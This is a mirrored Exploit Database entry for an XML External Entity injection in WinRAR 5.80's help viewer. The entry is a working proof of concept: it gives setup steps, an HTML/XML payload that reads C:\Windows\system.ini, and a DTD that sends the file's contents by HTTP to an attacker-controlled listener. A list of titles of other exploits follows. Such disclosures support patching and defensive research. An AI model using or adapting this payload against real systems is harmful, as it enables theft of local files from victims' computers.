Winrar 5.80 – XML External Entity Injection

Exploit Database
34 阅读

作者： hyp3rlinx

日期： 2019-10-21
类别：
- local
平台：
- xml
来源：https://www.exploit-db.com/exploits/47526/

# Exploit Title: winrar 5.80 - XML External Entity Injection
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit

# POC

1- python -m SimpleHTTPServer (listens Port 8000)
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the exploit to the window


html file

<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>



==============================
start.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;

last Exploits
Winrar 5.80 – XML External Entity Injection的更多信息

10Strike LANState 9.32 – ‘Force Check’ Buffer Overflow (SEH)：
Druva inSync Windows Client 6.6.3 – Local Privilege Escalation (PowerShell)：
Free MP3 CD Ripper 2.8 – Multiple File Buffer Overflow (Metasploit)：
Microsoft Exchange Active Directory Topology 15.0.847.40 – ‘Service MSExchangeADTopology’ Unquoted Service Path：
CloudMe 1.11.2 – Buffer Overflow ROP (DEP,ASLR)：
Microsoft Windows Server 2003 SP2 – TCP/IP IOCTL Privilege Escalation (MS14-070)：
RM Downloader 3.1.3.2.2010.06.13 – ‘Load’ Buffer Overflow (SEH)：
Adobe On Location CS4 – ‘ibfs32.dll’ DLL Hijacking：